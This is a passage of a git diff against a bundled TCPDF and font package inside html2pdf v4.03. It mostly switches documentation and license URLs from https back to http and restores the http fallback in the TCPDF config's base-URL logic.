info@tecnick.com * @package com.tecnick.tcpdf * @version 4.9.005 - * @link https://tcpdf.sourceforge.net - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://tcpdf.sourceforge.net + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2004-10-27 */ @@ -63,14 +63,14 @@ if (!defined('K_TCPDF_EXTERNAL_CONFIG')) { if(isset($_SERVER['HTTPS']) AND (!empty($_SERVER['HTTPS'])) AND strtolower($_SERVER['HTTPS'])!='off') { $k_path_url = 'https://'; } else { - $k_path_url = 'https://'; + $k_path_url = 'http://'; } $k_path_url .= $_SERVER['HTTP_HOST']; $k_path_url .= str_replace( '\\', '/', substr($_SERVER['PHP_SELF'], 0, -24)); } /** - * URL path to tcpdf installation folder (https://localhost/tcpdf/). + * URL path to tcpdf installation folder (http://localhost/tcpdf/). * By default it is automatically calculated but you can also set it as a fixed string to improve performances. */ define ('K_PATH_URL', $k_path_url); diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config_alt.php b/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config_alt.php index b035869..3dcd561 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config_alt.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/config/tcpdf_config_alt.php @@ -24,8 +24,8 @@ * @copyright 2004-2010 Nicola Asuni - Tecnick.com S.r.l (www.tecnick.com) Via Della Pace, 11 - 09044 - Quartucciu (CA) - ITALY - www.tecnick.com - info@tecnick.com * @package com.tecnick.tcpdf * @version 4.9.005 - * @link https://tcpdf.sourceforge.net - * @license https://www.gnu.org/copyleft/lesser.html LGPL + * @link http://tcpdf.sourceforge.net + * @license http://www.gnu.org/copyleft/lesser.html LGPL * @since 2004-10-27 */ @@ -58,14 +58,14 @@ if (isset($_SERVER['HTTP_HOST']) AND (!empty($_SERVER['HTTP_HOST']))) { if(isset($_SERVER['HTTPS']) AND (!empty($_SERVER['HTTPS'])) AND strtolower($_SERVER['HTTPS'])!='off') { $k_path_url = 'https://'; } else { - $k_path_url = 'https://'; + $k_path_url = 'http://'; } $k_path_url .= $_SERVER['HTTP_HOST']; $k_path_url .= str_replace( '\\', '/', substr($_SERVER['PHP_SELF'], 0, -24)); } /** - * URL path to tcpdf installation folder (https://localhost/tcpdf/). + * URL path to tcpdf installation folder (http://localhost/tcpdf/). * By default it is automatically calculated but you can also set it as a fixed string to improve performances.. */ define ('K_PATH_URL', $k_path_url); diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/doc/read_me.txt b/html2pdf_v4.03/_tcpdf_5.0.002/doc/read_me.txt index 76169c2..6ab2179 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/doc/read_me.txt +++ b/html2pdf_v4.03/_tcpdf_5.0.002/doc/read_me.txt @@ -1,3 +1,3 @@ -You can read the documentation at : https://www.tecnick.com/pagefiles/tcpdf/doc/index.html +You can read the documentation at : http://www.tecnick.com/pagefiles/tcpdf/doc/index.html it has been removed because of the size of the package of HTML2PDF... \ No newline at end of file diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/examples/read_me.txt b/html2pdf_v4.03/_tcpdf_5.0.002/examples/read_me.txt index 542ac74..de07e6b 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/examples/read_me.txt +++ b/html2pdf_v4.03/_tcpdf_5.0.002/examples/read_me.txt @@ -1,3 +1,3 @@ -You can read the documentation at : https://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=tcpdf_examples +You can read the documentation at : http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=tcpdf_examples it has been removed because of the size of the package of HTML2PDF... \ No newline at end of file diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/BUGS b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/BUGS index be334db..8e64b89 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/BUGS +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/BUGS @@ -1,3 +1,3 @@ -See https://dejavu.sourceforge.net/wiki/index.php/Bugs +See http://dejavu.sourceforge.net/wiki/index.php/Bugs $Id: BUGS 80 2004-11-13 13:12:02Z src $ diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/README b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/README index 9797e2f..82cf8c9 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/README +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/dejavu-fonts-ttf-2.30/README @@ -2,7 +2,7 @@ DejaVu fonts 2.30 (c)2004-2009 DejaVu fonts team ------------------------------------------------ The DejaVu fonts are a font family based on the Bitstream Vera Fonts -(https://gnome.org/fonts/). Its purpose is to provide a wider range of +(http://gnome.org/fonts/). Its purpose is to provide a wider range of characters (see status.txt for more information) while maintaining the original look and feel. @@ -39,10 +39,10 @@ For license information see LICENSE. What's new is described in NEWS. Known bugs are in BUGS. All authors are mentioned in AUTHORS. Fonts are published in source form as SFD files (Spline Font Database from -FontForge - https://fontforge.sf.net/) and in compiled form as TTF files +FontForge - http://fontforge.sf.net/) and in compiled form as TTF files (TrueType fonts). -For more information go to https://dejavu.sourceforge.net/. +For more information go to http://dejavu.sourceforge.net/. Characters from Arev fonts, Copyright (c) 2006 by Tavmjong Bah: --------------------------- diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/AUTHORS b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/AUTHORS index f3b2780..e7f99ba 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/AUTHORS +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/AUTHORS @@ -7,7 +7,7 @@ The FreeFont collection is being maintained by The folowing list cites the other contributors that contributed to particular ISO 10646 blocks. -* URW++ Design & Development GmbH <https://www.urwpp.de/> +* URW++ Design & Development GmbH <http://www.urwpp.de/> Basic Latin (U+0041-U+007A) Latin-1 Supplement (U+00C0-U+00FF) (most) diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/COPYING b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/COPYING index 8859f3d..818433e 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/COPYING +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/COPYING @@ -1,7 +1,7 @@ GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 - Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/> + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. @@ -645,7 +645,7 @@ the "copyright" line and a pointer to where the full notice is found. GNU General Public License for more details. You should have received a copy of the GNU General Public License - along with this program. If not, see <https://www.gnu.org/licenses/>. + along with this program. If not, see <http://www.gnu.org/licenses/>. Also add information on how to contact you by electronic and paper mail. @@ -664,11 +664,11 @@ might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see -<https://www.gnu.org/licenses/>. +<http://www.gnu.org/licenses/>. The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read -<https://www.gnu.org/philosophy/why-not-lgpl.html>. +<http://www.gnu.org/philosophy/why-not-lgpl.html>. diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/CREDITS b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/CREDITS index fde58fd..8edb068 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/CREDITS +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/CREDITS @@ -5,10 +5,10 @@ This file lists contributors and contributions to the GNU FreeFont project. -* URW++ Design & Development GmbH <https://www.urwpp.de/> +* URW++ Design & Development GmbH <http://www.urwpp.de/> URW++ donated a set of 35 core PostScript Type 1 fonts to the -Ghostscript project <https://www.cs.wisc.edu/~ghost/>, to be available +Ghostscript project <http://www.cs.wisc.edu/~ghost/>, to be available under the terms of GNU General Public License (GPL). Basic Latin (U+0041-U+007A) @@ -24,7 +24,7 @@ under the terms of GNU General Public License (GPL). Plaice <plaice AT omega.cse.unsw.edu.au> Yannis Haralambous and John Plaice are the authors of Omega typesetting -system, <https://omega.enstb.org/>. Omega is an extension of TeX. +system, <http://omega.enstb.org/>. Omega is an extension of TeX. Its first release, aims primarily at improving TeX's multilingual abilities. In Omega all characters and pointers into data-structures are 16-bit wide, instead of 8-bit, thereby eliminating many of the trivial limitations of TeX. @@ -50,7 +50,7 @@ Omega fonts are available subject to GPL Arabic Presentation Forms-A (U+FB50-U+FDFF) Arabic Presentation Forms-B (U+FE70-U+FEFF) -Current info: <https://tug.ctan.org/cgi-bin/ctanPackageInformation.py?id=omega> +Current info: <http://tug.ctan.org/cgi-bin/ctanPackageInformation.py?id=omega> * Valek Filippov <frob AT df.ru> @@ -90,7 +90,7 @@ fonts, these glyphs are thinner than those of original Times fonts. That is, the rule thickness of these glyphs is around 85% of that of the Times fonts, but still thicker than that of the CM fonts." TX fonts are are distributed under the GNU public license (GPL). -<https://www.ctan.org/tex-archive/fonts/txfonts/>. +<http://www.ctan.org/tex-archive/fonts/txfonts/>. Arrows (U+2190-U+21FF) Mathematical Symbols (U+2200-U+22FF) @@ -127,7 +127,7 @@ intlfonts 1.2 package and is available under the GPL at Shaheed Haque has developed a basic set of basic Bengali glyphs (without ligatures), using ISO10646 encoding. They are available under -the XFree86 license at <https://www.btinternet.com/~shaheedhaque/>. +the XFree86 license at <http://www.btinternet.com/~shaheedhaque/>. Copyright (C) 2001 S.R.Haque <srhaque AT iee.org>. All Rights Reserved. @@ -162,7 +162,7 @@ S.R.Haque. Sam Stepanyan created a set of Armenian sans serif glyphs visually compatible with Helvetica or Arial. Available on -<https://www.editum.com.ar/mashtots/html/fonts/ara.tar.gz>. On +<http://www.editum.com.ar/mashtots/html/fonts/ara.tar.gz>. On 2002-01-24, Sam writes: "Arial Armenian font is free for non-commercial use, so it is OK to use under GPL license." @@ -172,7 +172,7 @@ non-commercial use, so it is OK to use under GPL license." * Mohamed Ishan <ishan AT mitf.f2s.com> Mohamed Ishan has started a Thaana Unicode Project -<https://thaana.sourceforge.net/> and among other things created a +<http://thaana.sourceforge.net/> and among other things created a couple of Thaana fonts, available under FDL or BDF license. Thaana (U+0780-U+07BF) @@ -181,7 +181,7 @@ couple of Thaana fonts, available under FDL or BDF license. * Sushant Kumar Dash <sushant AT writeme.com> (*) Sushant Dash has created a font in his mother tongue, Oriya. As he -states on his web page <https://members.tripod.com/~sushantdash/>: +states on his web page <http://members.tripod.com/~sushantdash/>: "Please feel free to foreword this mail to your Oriya friends. No copyright law is applied for this font. It is totally free!!! Feel free to modify this using any font editing tools. This is designed for @@ -194,7 +194,7 @@ fonts.(Or the cost of the available packages are too much)." * Harsh Kumar <harshkumar AT vsnl.com> -Harsh Kumar has started BharatBhasha <https://www.bharatbhasha.net/> - +Harsh Kumar has started BharatBhasha <http://www.bharatbhasha.net/> - an effort to provide "FREE software, Tutorial, Source Codes etc. available for working in Hindi, Marathi, Gujarati, Gurmukhi and Bangla. You can type text, write Web pages or develop Indian Languages @@ -211,7 +211,7 @@ languages." * Prasad A. Chodavarapu <chprasad AT hotmail.com> Prasad A. Chodavarapu created Tikkana, a Telugu font available in Type -1 and TrueType format on <https://chaitanya.bhaavana.net/fonts/>. +1 and TrueType format on <http://chaitanya.bhaavana.net/fonts/>. Tikkana exceeds the Unicode Telugu range with some composite glyphs. Available under the GNU General Public License. @@ -227,7 +227,7 @@ under the terms of GNU GPL. Later, Anshuman Pandey from the Washington University, Seattle, USA, took over the maintenance of font. Fonts can be found on CTAN, <ftp://ftp.dante.de/tex-archive/language/devanagari/>. I converted the font to Type 1 format using Péter Szabó's TeXtrace -program <https://www.inf.bme.hu/~pts/textrace/> and removed some +program <http://www.inf.bme.hu/~pts/textrace/> and removed some redundant control points with PfaEdit. Devanagari (U+0900-U+097F) @@ -278,11 +278,11 @@ of Computer Science, University of Hamburg, prepared a set of Ethiopic metafonts, found on <ftp://ftp.dante.de/tex-archive/language/ethiopia/ethiop/>. They also maintain home page on the Ethiopic font project, -<https://www.informatik.uni-hamburg.de/TGI/mitarbeiter/wimis/kummer/ethiop_eng.html>, +<http://www.informatik.uni-hamburg.de/TGI/mitarbeiter/wimis/kummer/ethiop_eng.html>, and can be reached at <ethiop AT informatik.uni-hamburg.de>. The current version of fonts is 0.7 (1998), and they are released under GNU GPL. I converted the fonts to Type 1 format using Péter Szabó's TeXtrace-A -program <https://www.inf.bme.hu/~pts/textrace/> and removed some +program <http://www.inf.bme.hu/~pts/textrace/> and removed some redundant control points with PfaEdit. Ethiopic (U+1200-U+137F) @@ -295,7 +295,7 @@ Hebrew-speaking Linux and Unix community with a basic collection of Hebrew fonts for X Windows. The fonts are visually compatible with URW++ Century Schoolbook L, URW++ Nimbus Sans L and URW++ Nimbus Mono L families, respectively, and are released under GNU GPL license. See -also <https://culmus.sourceforge.net/>. +also <http://culmus.sourceforge.net/>. Hebrew (U+0590-U+05FF) @@ -315,7 +315,7 @@ with the UCS fonts to fill the 2800-28FF range completely. (uniform scaling is possible to adapt it to any cell size). He also contributed a free syriac font, whose glyphs (about half of them) are borrowed from the "Carlo Ator" font freely downloadable from -<https://www.aacf.asso.fr/>. Vyacheslav also filled in a few missing +<http://www.aacf.asso.fr/>. Vyacheslav also filled in a few missing spots in the U+2000-U+27FF area, e.g. the box drawing section, sets of subscript and superscript digits and capital Roman numbers. @@ -327,12 +327,12 @@ subscript and superscript digits and capital Roman numbers. * M.S. Sridhar <mssridhar AT vsnl.com> M/S Cyberscape Multimedia Limited, Mumbai, developers of Akruti -Software for Indian Languages (https://www.akruti.com/), have released +Software for Indian Languages (http://www.akruti.com/), have released a set of TTF fonts for nine Indian scripts (Devanagari, Gujarati, Telugu, Tamil, Malayalam, Kannada, Bengali, Oriya, and Gurumukhi) under the GNU General Public License (GPL). You can download the fonts from the Free Software Foundation of India WWW site -(https://www.gnu.org.in/akruti-fonts/) or from the Akruti website. +(http://www.gnu.org.in/akruti-fonts/) or from the Akruti website. For any further information or assistance regarding these fonts, please contact mssridhar AT vsnl.com. @@ -352,7 +352,7 @@ please contact mssridhar AT vsnl.com. <nlevitt AT columbia.edu> Noah Levitt found out that the Sinhalese fonts available on the site -<https://www.metta.lk/fonts/> are released under GNU GPL, or, +<http://www.metta.lk/fonts/> are released under GNU GPL, or, precisely, "Public Domain under GNU Licence Produced by DMS Electronics for The Sri Lanka Tipitaka Project" (taken from the font comment), and took the effort of recoding the font to Unicode. @@ -365,7 +365,7 @@ comment), and took the effort of recoding the font to Unicode. Dan Chirkov updated the FreeSerif font with the missing Cyrillic glyphs needed for conformance to Unicode 3.2. The effort is part of the Slavjanskij package for Mac OS X, -<https://www.versiontracker.com/dyn/moreinfo/macosx/18680>. +<http://www.versiontracker.com/dyn/moreinfo/macosx/18680>. Cyrillic (U+0400-U+04FF) @@ -404,7 +404,7 @@ to reflect the revised edition Rachana_04. Bengali (U+0980-U+09FF) Solaiman Karim has developed several OpenType Bangla fonts and -released them under GNU GPL on <https://www.ekushey.org>. +released them under GNU GPL on <http://www.ekushey.org>. * Sonali Sonania <sonalisonania AT gmail.com> and Monika Shah @@ -443,7 +443,7 @@ Sans" font belongs to sans serif style and is actually a compilation of already released Indic fonts (Gargi, Padma, Mukti, Utkal, Akruti and ThendralUni). Both fonts are based on Unicode standard. You can download the font files (released under GNU/GPL License) from -https://www.gnowledge.org/Gnoware/localization/font.htm +http://www.gnowledge.org/Gnoware/localization/font.htm * Kulbir Singh Thind @@ -453,7 +453,7 @@ https://www.gnowledge.org/Gnoware/localization/font.htm Dr. Kulbir Singh Thind designed a set of Gurmukhi Unicode fonts, AnmolUni and AnmolUni-Bold, which are available under the terms of GNU Generel Public Licens from the Punjabu Computing Resource Center, -https://guca.sourceforge.net/typography/fonts/anmoluni/. +http://guca.sourceforge.net/typography/fonts/anmoluni/. * Gia Shervashidze <giasher AT telenet.ge> @@ -463,7 +463,7 @@ https://guca.sourceforge.net/typography/fonts/anmoluni/. Starting in mid-1990s, Gia Shervashidze designed many Unicode-compliant Georgian fonts: Times New Roman Georgian, Arial Georgian, Courier New Georgian. His work on Georgian localization can -be reached at https://www.gia.ge/. +be reached at http://www.gia.ge/. * Primož Peterlin <primoz.peterlin AT biofiz.mf.uni-lj.si> diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/ChangeLog b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/ChangeLog index 220a1f9..fb8bfd8 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/ChangeLog +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/ChangeLog @@ -500,7 +500,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ * FreeSerif.sfd: Made Coptic to comply better with - https://www.wazu.jp/gallery/Test_Coptic.html + http://www.wazu.jp/gallery/Test_Coptic.html Made a flourish at foot of letters with long diagonal. More tweeks to Coptic; put in a mark lookup table. @@ -560,7 +560,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Added Glagolitic "round type" font (Croation capitols only) from the collection of Croatian fonts for LaTeX by Darko Zubrinić ftp://ftp.dante.de/tex-archive/languages/croatian/ - https://www.tug.org/TUGboat/Articles/tb17-1/tb50zubr.pdf + http://www.tug.org/TUGboat/Articles/tb17-1/tb50zubr.pdf Several letters are missing besides the small letters. @@ -659,7 +659,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Added 5 Armenian ligatures to U+FB13 – FB17, and made corresponding 'liga' lookup. Found there one ligature u+0587 that according to - https://en.wikipedia.org/wiki/Armenian_alphabet + http://en.wikipedia.org/wiki/Armenian_alphabet "in new orthography the և character is not a typographical ligature anymore, and must never be treated as such. It is a distinct letter and has its place in the new alphabetic sequence." So moved this out of the 'liga' lookup and into a new 'hlig' lookup. @@ -683,7 +683,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ * FreeSerif.sfd: WAZU says - https://www.wazu.jp/gallery/Fonts_Hanunoo.html + http://www.wazu.jp/gallery/Fonts_Hanunoo.html MPH 2B Damase doesn't support the consonant-vowel ligatures necessary to render Buhid writing. @@ -693,7 +693,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ don't know why. Made page to match the example of the combining forms at - https://www.omniglot.com/writing/hanunoo.htm + http://www.omniglot.com/writing/hanunoo.htm 2008-10-24 Stevan_White * FreeSerif.sfd: @@ -704,7 +704,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Tweeked combining marks for Vietnamese. Made to satisfy WAZU JAPAN Comprehensive Unicode Test Page for Vietnamese - https://www.wazu.jp/gallery/Test_Vietnamese.html + http://www.wazu.jp/gallery/Test_Vietnamese.html Could still use some tweeking... * FreeSerif.sfd: @@ -1011,7 +1011,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Replaced Malayalam range with that from Rachana_04 found on Swathanthra Malayalam Computing project page - https://savannah.nongnu.org/projects/smc/ + http://savannah.nongnu.org/projects/smc/ Besides scaling and converting to cubic, performed much clean-up of glyphs, added an r2 character, and re-named a bunch of characters. @@ -1769,7 +1769,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Gurmukhi: filled range in Serif, taking glyphs from the original Punjabi font by Hardip Singh Pannu - https://members.aol.com/hspannu/punjabi.html (file pb_win95.exe) + http://members.aol.com/hspannu/punjabi.html (file pb_win95.exe) 2008-05-12 Steve White * FreeSans.sfd, FreeSerifBold.sfd, FreeSerifBoldItalic.sfd: @@ -1946,7 +1946,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Adjusted heights of extensible brackets Fixed problems with extensible brackets, thanks to Markus Kuhn's page - https://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-demo.txt + http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-demo.txt * ranges.py: @@ -2036,13 +2036,13 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Added Hanunóo script, with characters based on those in font MPH2BDamase, on request from the maintainer of that font, - https://packages.debian.org/sid/ttf-mph-2b-damase + http://packages.debian.org/sid/ttf-mph-2b-damase Glyphs are simple vector strokes. Could be a little more uniform. Added Buginese script "Lontara", with characters based on those in font MPH2BDamase, on request from the maintainer of that font, - https://packages.debian.org/sid/ttf-mph-2b-damase + http://packages.debian.org/sid/ttf-mph-2b-damase Note the glyphs are pretty rough, clearly a digitization of handwriting. I just cleaned them up, and corrected discrepancies with Unicode, @@ -2618,7 +2618,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Adjusted and added some enclosing diacritics 20DD - 20E0 In response to Debian bug #472566 ttf-freefont: U+20DD COMBINING ENCOLSING CIRCLE doesn't combine - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=472566 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=472566 2008-03-26 Steve White * FreeSerif.sfd: @@ -2725,7 +2725,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ renamed it to uFFFF, re-linked others by hand commaaccent - https://diacritics.typo.cz/index.php?id=9 + http://diacritics.typo.cz/index.php?id=9 should be u+0326 but wasn't linked to anything * FreeSansBold.sfd: @@ -3603,15 +3603,15 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ * sfd/FreeSans.sfd - added U+0278, U+03D5, U+2248. Corrected U+2071, U+222E, U+2242, U+2243 in response to bug reports - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=276118 - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=276120 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=276118 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=276120 * sfd/FreeMono.sfd - added U+2227, U+2228, U+2262. Corrected U+2299-229D in response to bug report - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=276121 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=276121 * sfd/FreeMonoBold.sfd - added U+2010, U+2012 in response to bug - report https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=289032 + report http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=289032 Swapped U+03C6 (Greek small letter phi) and U+03D5 (Greek phi symbol) in order to conform to Unicode standard. Simplified glyph shapes in ASCII range. Started adding "above" and "below" anchors. @@ -4036,7 +4036,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ 2003-03-18 Primoz Peterlin <primoz.peterlin@biofiz.mf.uni-lj.si> * sfd/FreeSans.sfd - Added Sinhala glyphs from the Tipitaka - project <https://www.metta.lk>, recoded to Unicode by Noah Levitt. + project <http://www.metta.lk>, recoded to Unicode by Noah Levitt. 2003-02-19 Primoz Peterlin <primoz.peterlin@biofiz.mf.uni-lj.si> @@ -4312,7 +4312,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ Beyene, Prof. Dr. Manfred Kudlek, Olaf Kummer, and Jochen Metzinger) using Szabo's TeXtrace and retouched using PfaEdit. Ethiopian metafonts are released under GNU GPL, - <https://www.informatik.uni-hamburg.de/TGI/mitarbeiter/wimis/kummer/ethiop_eng.html>. + <http://www.informatik.uni-hamburg.de/TGI/mitarbeiter/wimis/kummer/ethiop_eng.html>. * sfd/FreeMonoBold.sfd - Added 40 characters, mostly in the Latin Extended-B and IPA Extensions areas. @@ -4359,7 +4359,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ * sfd/FreeMono.sfd - Added more or less complete Armenian area. The glyphs are a tidied-up version based on the Armenian - Courier on the <https://www.cilicia.com/armo8.html>. Now we have + Courier on the <http://www.cilicia.com/armo8.html>. Now we have 1673 characters. 2002-03-28 Primoz Peterlin <primoz.peterlin@biofiz.mf.uni-lj.si> @@ -4432,7 +4432,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ * sfd/FreeSerif.sfd - Anshuman Pandey has only converted Gurmukhi from TrueType to Metafont; the original author of Gurkmukhi font - is Hardip Singh Pannu <https://members.aol.com/hspannu/punjabi.html>. + is Hardip Singh Pannu <http://members.aol.com/hspannu/punjabi.html>. Got the permission from him to include the Gurmukhi glyph set. 2002-03-08 Primoz Peterlin <primoz.peterlin@biofiz.mf.uni-lj.si> @@ -4483,7 +4483,7 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ * ChangeLog file created * sfd/FreeSerif.sfd - Added some Telugu glyphs to page 0x0C, - courtesy Prasad A. Chodavarapu <https://chaitanya.bhaavana.net/fonts/> + courtesy Prasad A. Chodavarapu <http://chaitanya.bhaavana.net/fonts/> * sfd/FreeSerif.sfd - Added some glyphs to the Miscellaneous Symbols page (0x26). @@ -4517,9 +4517,9 @@ $Id: ChangeLog,v 1.254 2009/01/04 16:12:59 Stevan_White Exp $ * tools/CheckConformance.pl created - a Perl script for checking conformance of a font file with a given coded character set - * homepage <https://www.freesoftware.fsf.org/freefont/> created + * homepage <http://www.freesoftware.fsf.org/freefont/> created 2002-02-19 Primoz Peterlin <primoz.peterlin@biofiz.mf.uni-lj.si> * freefont (Free UCS Scalable Fonts) project approved on - savannah.gnu.org: <https://savannah.gnu.org/projects/freefont/> + savannah.gnu.org: <http://savannah.gnu.org/projects/freefont/> diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/INSTALL b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/INSTALL index 2debc42..7c5c6b6 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/INSTALL +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/INSTALL @@ -9,14 +9,14 @@ UNIX/GNU/Linux/BSD Systems -------------------------- FreeFont works with any system using the free font rasterizer FreeType -<https://www.freetype.org/>. +<http://www.freetype.org/>. * Debian GNU/Linux Users of Debian GNU/Linux system will probably want to use the Debian package, available from the Debian site, - <https://packages.debian.org/unstable/x11/ttf-freefont.html>, + <http://packages.debian.org/unstable/x11/ttf-freefont.html>, or any of its mirrors. diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/README b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/README index ef976d4..414c0ee 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/README +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/freefont-20090104/README @@ -19,10 +19,10 @@ FreeFont covers the following character sets * ISO 8859 parts 1-15 * CEN MES-3 European Unicode Subset - https://www.evertype.com/standards/iso10646/pdf/cwa13873.pdf + http://www.evertype.com/standards/iso10646/pdf/cwa13873.pdf * IBM/Microsoft code pages 437, 850, 852, 1250, 1252 and more * Microsoft/Adobe Windows Glyph List 4 (WGL4) - https://www.microsoft.com/typography/otspec/WGL4.htm + http://www.microsoft.com/typography/otspec/WGL4.htm * KOI8-R and KOI8-RU * DEC VT100 graphics symbols * International Phonetic Alphabet @@ -36,7 +36,7 @@ Editing ------- The free outline font editor, George Williams's FontForge -<https://fontforge.sourceforge.net/> is used for editing the fonts. +<http://fontforge.sourceforge.net/> is used for editing the fonts. Design Issues ------------- @@ -104,5 +104,5 @@ in Linux still don't support them. Primoz Peterlin, <primoz.peterlin@biofiz.mf.uni-lj.si> Steve White <stevan.white@googlemail.com> -Free UCS scalable fonts: https://savannah.gnu.org/projects/freefont/ +Free UCS scalable fonts: http://savannah.gnu.org/projects/freefont/ $Id: README,v 1.6 2008/12/25 12:51:41 Stevan_White Exp $ diff --git a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makeallttffonts.php b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makeallttffonts.php index 6d05393..bf39587 100755 --- a/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makeallttffonts.php +++ b/html2pdf_v4.03/_tcpdf_5.0.002/fonts/utils/makeallttffonts.php @@ -32,7 +32,7 @@ // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License -// along with this program. If not, see <https://www.gnu.org/licenses/>. +// along with this program. If not, see <http://www.gnu.org/licenses/>. // // Additionally, you can't remove the original TCExam logo, copyrights statements // and links to Tecnick.com and TCExam websites. @@ -45,7 +45,7 @@ * @package com.tecnick.tcpdf * @author Nicola Asuni * @copyright Copyright © 2004-2009, Nicola Asuni - Tecnick.com S.r.l. - ITALY - www.tecnick.com - info@tecnick.com - * @license https://www.gnu.org/copyleft/gpl.html GNU General Public License + * @license http://www.gnu.org/copyleft/gpl.html GNU General Public License * @link www.tecnick.com * @since 2008-12-07 */ diff --git 